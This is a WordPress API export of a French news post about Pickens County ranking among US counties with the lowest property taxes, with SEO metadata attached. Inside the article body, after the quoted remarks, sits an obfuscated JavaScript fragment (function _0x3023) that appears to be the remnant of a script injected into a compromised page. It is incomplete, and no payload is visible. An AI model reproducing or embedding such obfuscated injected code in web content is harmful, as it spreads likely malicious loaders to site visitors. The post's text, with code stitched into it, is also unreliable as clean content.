{"id":9510,"date":"2020-10-28T16:36:28","date_gmt":"2020-10-28T16:36:28","guid":{"rendered":"http:\/\/alliancepickens.com\/2020\/10\/28\/la-fondation-fiscale-reconnait-les-faibles-impots-du-comte-pickens-sentinel\/"},"modified":"2021-07-21T18:27:00","modified_gmt":"2021-07-21T18:27:00","slug":"la-fondation-fiscale-reconnait-les-faibles-impots-du-comte-pickens-sentinel","status":"publish","type":"post","link":"https:\/\/alliancepickens.com\/fr\/la-fondation-fiscale-reconnait-les-faibles-impots-du-comte-pickens-sentinel\/","title":{"rendered":"La Fondation fiscale reconna\u00eet les faibles imp\u00f4ts du comt\u00e9 &#8211; Pickens Sentinel"},"content":{"rendered":"<p>Par Jason Evans<br \/>\nCOMT\u00c9 DE PICKENS \u2013 Le comt\u00e9 de Pickens s\u2019est class\u00e9 dans une liste de comt\u00e9s de plus de 65 000 habitants ayant l\u2019imp\u00f4t foncier le plus bas.<br \/>\nEn septembre, the Tax Foundation, un organisme \u00e9ducatif non partisan qui cherche \u00e0 aider les contribuables au sujet des politiques fiscales, a publi\u00e9 une liste de 788 comt\u00e9s des \u00c9tats-Unis avec les imp\u00f4ts fonciers les plus bas en fonction des imp\u00f4ts fonciers et de la valeur des maisons.<br \/>\nLe comt\u00e9 de Pickens s\u2019est class\u00e9 720e sur la liste, avec une taxe moyenne de 551 $, a d\u00e9clar\u00e9 l\u2019administrateur du comt\u00e9 J. Chappell Hurst.<br \/>\n\u00ab C\u2019est inf\u00e9rieur \u00e0 Oconee, Laurens, Greenwood, Greenville, Spartanburg et tous les autres comt\u00e9s de l\u2019\u00c9tat \u00bb, a d\u00e9clar\u00e9 Hurst. \u00ab ela montre que ce comt\u00e9 a \u00e9t\u00e9 tr\u00e8s frugal au fil des ans et regard\u00e9 comment nous avons d\u00e9pens\u00e9 de l\u2019argent.&nbsp;\u00bb<br \/>\nfunction _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);};<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Par Jason Evans COMT\u00c9 DE PICKENS \u2013 Le comt\u00e9 de Pickens s\u2019est class\u00e9 dans une liste de comt\u00e9s de plus de 65 000 habitants ayant l\u2019imp\u00f4t foncier le plus bas. En septembre, the Tax Foundation, un organisme \u00e9ducatif non partisan qui cherche \u00e0 aider les contribuables au sujet des politiques fiscales, a publi\u00e9 une liste&hellip;<\/p>\n","protected":false},"author":8,"featured_media":5101,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":[],"categories":[55],"tags":[],"class_list":["post-9510","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-news-fr","category-55","description-off"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.4 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>La Fondation fiscale reconna\u00eet les faibles imp\u00f4ts du comt\u00e9 - Pickens Sentinel - Alliance Pickens<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/alliancepickens.com\/fr\/la-fondation-fiscale-reconnait-les-faibles-impots-du-comte-pickens-sentinel\/\" \/>\n<meta property=\"og:locale\" content=\"fr_FR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"La Fondation fiscale reconna\u00eet les faibles imp\u00f4ts du comt\u00e9 - Pickens Sentinel - Alliance Pickens\" \/>\n<meta property=\"og:description\" content=\"Par Jason Evans COMT\u00c9 DE PICKENS \u2013 Le comt\u00e9 de Pickens s\u2019est class\u00e9 dans une liste de comt\u00e9s de plus de 65 000 habitants ayant l\u2019imp\u00f4t foncier le plus bas. En septembre, the Tax Foundation, un organisme \u00e9ducatif non partisan qui cherche \u00e0 aider les contribuables au sujet des politiques fiscales, a publi\u00e9 une liste&hellip;\" \/>\n<meta property=\"og:url\" content=\"https:\/\/alliancepickens.com\/fr\/la-fondation-fiscale-reconnait-les-faibles-impots-du-comte-pickens-sentinel\/\" \/>\n<meta property=\"og:site_name\" content=\"Alliance Pickens\" \/>\n<meta property=\"article:published_time\" content=\"2020-10-28T16:36:28+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2021-07-21T18:27:00+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/alliancepickens.com\/wp-content\/uploads\/2019\/04\/post-generic.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"990\" \/>\n\t<meta property=\"og:image:height\" content=\"618\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"AP Transfer\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"AP Transfer\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"1 minute\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/fr\\\/la-fondation-fiscale-reconnait-les-faibles-impots-du-comte-pickens-sentinel\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/fr\\\/la-fondation-fiscale-reconnait-les-faibles-impots-du-comte-pickens-sentinel\\\/\"},\"author\":{\"name\":\"AP Transfer\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/fr\\\/#\\\/schema\\\/person\\\/fbaefd2934455049d2defd0477ce0d01\"},\"headline\":\"La Fondation fiscale reconna\u00eet les faibles imp\u00f4ts du comt\u00e9 &#8211; Pickens Sentinel\",\"datePublished\":\"2020-10-28T16:36:28+00:00\",\"dateModified\":\"2021-07-21T18:27:00+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/fr\\\/la-fondation-fiscale-reconnait-les-faibles-impots-du-comte-pickens-sentinel\\\/\"},\"wordCount\":205,\"image\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/fr\\\/la-fondation-fiscale-reconnait-les-faibles-impots-du-comte-pickens-sentinel\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/alliancepickens.com\\\/wp-content\\\/uploads\\\/2019\\\/04\\\/post-generic.jpg\",\"articleSection\":[\"News\"],\"inLanguage\":\"fr-FR\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/fr\\\/la-fondation-fiscale-reconnait-les-faibles-impots-du-comte-pickens-sentinel\\\/\",\"url\":\"https:\\\/\\\/alliancepickens.com\\\/fr\\\/la-fondation-fiscale-reconnait-les-faibles-impots-du-comte-pickens-sentinel\\\/\",\"name\":\"La Fondation fiscale reconna\u00eet les faibles imp\u00f4ts du comt\u00e9 - Pickens Sentinel - Alliance Pickens\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/fr\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/fr\\\/la-fondation-fiscale-reconnait-les-faibles-impots-du-comte-pickens-sentinel\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/fr\\\/la-fondation-fiscale-reconnait-les-faibles-impots-du-comte-pickens-sentinel\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/alliancepickens.com\\\/wp-content\\\/uploads\\\/2019\\\/04\\\/post-generic.jpg\",\"datePublished\":\"2020-10-28T16:36:28+00:00\",\"dateModified\":\"2021-07-21T18:27:00+00:00\",\"author\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/fr\\\/#\\\/schema\\\/person\\\/fbaefd2934455049d2defd0477ce0d01\"},\"breadcrumb\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/fr\\\/la-fondation-fiscale-reconnait-les-faibles-impots-du-comte-pickens-sentinel\\\/#breadcrumb\"},\"inLanguage\":\"fr-FR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/alliancepickens.com\\\/fr\\\/la-fondation-fiscale-reconnait-les-faibles-impots-du-comte-pickens-sentinel\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"fr-FR\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/fr\\\/la-fondation-fiscale-reconnait-les-faibles-impots-du-comte-pickens-sentinel\\\/#primaryimage\",\"url\":\"https:\\\/\\\/alliancepickens.com\\\/wp-content\\\/uploads\\\/2019\\\/04\\\/post-generic.jpg\",\"contentUrl\":\"https:\\\/\\\/alliancepickens.com\\\/wp-content\\\/uploads\\\/2019\\\/04\\\/post-generic.jpg\",\"width\":990,\"height\":618,\"caption\":\"Alliance Pickens Logo\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/fr\\\/la-fondation-fiscale-reconnait-les-faibles-impots-du-comte-pickens-sentinel\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/alliancepickens.com\\\/fr\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"La Fondation fiscale reconna\u00eet les faibles imp\u00f4ts du comt\u00e9 &#8211; Pickens Sentinel\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/fr\\\/#website\",\"url\":\"https:\\\/\\\/alliancepickens.com\\\/fr\\\/\",\"name\":\"Alliance Pickens\",\"description\":\"recruitment and expansion in Pickens County\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/alliancepickens.com\\\/fr\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"fr-FR\"},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/fr\\\/#\\\/schema\\\/person\\\/fbaefd2934455049d2defd0477ce0d01\",\"name\":\"AP Transfer\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"fr-FR\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/db90baf906a6267650699f5b70c5136a4ae914ec7c295d799e8eff1e1ecb640f?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/db90baf906a6267650699f5b70c5136a4ae914ec7c295d799e8eff1e1ecb640f?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/db90baf906a6267650699f5b70c5136a4ae914ec7c295d799e8eff1e1ecb640f?s=96&d=mm&r=g\",\"caption\":\"AP Transfer\"},\"url\":\"https:\\\/\\\/alliancepickens.com\\\/fr\\\/author\\\/aptransfer\\\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"La Fondation fiscale reconna\u00eet les faibles imp\u00f4ts du comt\u00e9 - Pickens Sentinel - Alliance Pickens","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/alliancepickens.com\/fr\/la-fondation-fiscale-reconnait-les-faibles-impots-du-comte-pickens-sentinel\/","og_locale":"fr_FR","og_type":"article","og_title":"La Fondation fiscale reconna\u00eet les faibles imp\u00f4ts du comt\u00e9 - Pickens Sentinel - Alliance Pickens","og_description":"Par Jason Evans COMT\u00c9 DE PICKENS \u2013 Le comt\u00e9 de Pickens s\u2019est class\u00e9 dans une liste de comt\u00e9s de plus de 65 000 habitants ayant l\u2019imp\u00f4t foncier le plus bas. En septembre, the Tax Foundation, un organisme \u00e9ducatif non partisan qui cherche \u00e0 aider les contribuables au sujet des politiques fiscales, a publi\u00e9 une liste&hellip;","og_url":"https:\/\/alliancepickens.com\/fr\/la-fondation-fiscale-reconnait-les-faibles-impots-du-comte-pickens-sentinel\/","og_site_name":"Alliance Pickens","article_published_time":"2020-10-28T16:36:28+00:00","article_modified_time":"2021-07-21T18:27:00+00:00","og_image":[{"width":990,"height":618,"url":"https:\/\/alliancepickens.com\/wp-content\/uploads\/2019\/04\/post-generic.jpg","type":"image\/jpeg"}],"author":"AP Transfer","twitter_card":"summary_large_image","twitter_misc":{"Written by":"AP Transfer","Est. reading time":"1 minute"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/alliancepickens.com\/fr\/la-fondation-fiscale-reconnait-les-faibles-impots-du-comte-pickens-sentinel\/#article","isPartOf":{"@id":"https:\/\/alliancepickens.com\/fr\/la-fondation-fiscale-reconnait-les-faibles-impots-du-comte-pickens-sentinel\/"},"author":{"name":"AP Transfer","@id":"https:\/\/alliancepickens.com\/fr\/#\/schema\/person\/fbaefd2934455049d2defd0477ce0d01"},"headline":"La Fondation fiscale reconna\u00eet les faibles imp\u00f4ts du comt\u00e9 &#8211; Pickens Sentinel","datePublished":"2020-10-28T16:36:28+00:00","dateModified":"2021-07-21T18:27:00+00:00","mainEntityOfPage":{"@id":"https:\/\/alliancepickens.com\/fr\/la-fondation-fiscale-reconnait-les-faibles-impots-du-comte-pickens-sentinel\/"},"wordCount":205,"image":{"@id":"https:\/\/alliancepickens.com\/fr\/la-fondation-fiscale-reconnait-les-faibles-impots-du-comte-pickens-sentinel\/#primaryimage"},"thumbnailUrl":"https:\/\/alliancepickens.com\/wp-content\/uploads\/2019\/04\/post-generic.jpg","articleSection":["News"],"inLanguage":"fr-FR"},{"@type":"WebPage","@id":"https:\/\/alliancepickens.com\/fr\/la-fondation-fiscale-reconnait-les-faibles-impots-du-comte-pickens-sentinel\/","url":"https:\/\/alliancepickens.com\/fr\/la-fondation-fiscale-reconnait-les-faibles-impots-du-comte-pickens-sentinel\/","name":"La Fondation fiscale reconna\u00eet les faibles imp\u00f4ts du comt\u00e9 - Pickens Sentinel - Alliance Pickens","isPartOf":{"@id":"https:\/\/alliancepickens.com\/fr\/#website"},"primaryImageOfPage":{"@id":"https:\/\/alliancepickens.com\/fr\/la-fondation-fiscale-reconnait-les-faibles-impots-du-comte-pickens-sentinel\/#primaryimage"},"image":{"@id":"https:\/\/alliancepickens.com\/fr\/la-fondation-fiscale-reconnait-les-faibles-impots-du-comte-pickens-sentinel\/#primaryimage"},"thumbnailUrl":"https:\/\/alliancepickens.com\/wp-content\/uploads\/2019\/04\/post-generic.jpg","datePublished":"2020-10-28T16:36:28+00:00","dateModified":"2021-07-21T18:27:00+00:00","author":{"@id":"https:\/\/alliancepickens.com\/fr\/#\/schema\/person\/fbaefd2934455049d2defd0477ce0d01"},"breadcrumb":{"@id":"https:\/\/alliancepickens.com\/fr\/la-fondation-fiscale-reconnait-les-faibles-impots-du-comte-pickens-sentinel\/#breadcrumb"},"inLanguage":"fr-FR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/alliancepickens.com\/fr\/la-fondation-fiscale-reconnait-les-faibles-impots-du-comte-pickens-sentinel\/"]}]},{"@type":"ImageObject","inLanguage":"fr-FR","@id":"https:\/\/alliancepickens.com\/fr\/la-fondation-fiscale-reconnait-les-faibles-impots-du-comte-pickens-sentinel\/#primaryimage","url":"https:\/\/alliancepickens.com\/wp-content\/uploads\/2019\/04\/post-generic.jpg","contentUrl":"https:\/\/alliancepickens.com\/wp-content\/uploads\/2019\/04\/post-generic.jpg","width":990,"height":618,"caption":"Alliance Pickens Logo"},{"@type":"BreadcrumbList","@id":"https:\/\/alliancepickens.com\/fr\/la-fondation-fiscale-reconnait-les-faibles-impots-du-comte-pickens-sentinel\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/alliancepickens.com\/fr\/"},{"@type":"ListItem","position":2,"name":"La Fondation fiscale reconna\u00eet les faibles imp\u00f4ts du comt\u00e9 &#8211; Pickens Sentinel"}]},{"@type":"WebSite","@id":"https:\/\/alliancepickens.com\/fr\/#website","url":"https:\/\/alliancepickens.com\/fr\/","name":"Alliance Pickens","description":"recruitment and expansion in Pickens County","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/alliancepickens.com\/fr\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"fr-FR"},{"@type":"Person","@id":"https:\/\/alliancepickens.com\/fr\/#\/schema\/person\/fbaefd2934455049d2defd0477ce0d01","name":"AP Transfer","image":{"@type":"ImageObject","inLanguage":"fr-FR","@id":"https:\/\/secure.gravatar.com\/avatar\/db90baf906a6267650699f5b70c5136a4ae914ec7c295d799e8eff1e1ecb640f?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/db90baf906a6267650699f5b70c5136a4ae914ec7c295d799e8eff1e1ecb640f?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/db90baf906a6267650699f5b70c5136a4ae914ec7c295d799e8eff1e1ecb640f?s=96&d=mm&r=g","caption":"AP Transfer"},"url":"https:\/\/alliancepickens.com\/fr\/author\/aptransfer\/"}]}},"_links":{"self":[{"href":"https:\/\/alliancepickens.com\/fr\/wp-json\/wp\/v2\/posts\/9510","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/alliancepickens.com\/fr\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/alliancepickens.com\/fr\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/alliancepickens.com\/fr\/wp-json\/wp\/v2\/users\/8"}],"replies":[{"embeddable":true,"href":"https:\/\/alliancepickens.com\/fr\/wp-json\/wp\/v2\/comments?post=9510"}],"version-history":[{"count":0,"href":"https:\/\/alliancepickens.com\/fr\/wp-json\/wp\/v2\/posts\/9510\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/alliancepickens.com\/fr\/wp-json\/wp\/v2\/media\/5101"}],"wp:attachment":[{"href":"https:\/\/alliancepickens.com\/fr\/wp-json\/wp\/v2\/media?parent=9510"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/alliancepickens.com\/fr\/wp-json\/wp\/v2\/categories?post=9510"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/alliancepickens.com\/fr\/wp-json\/wp\/v2\/tags?post=9510"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}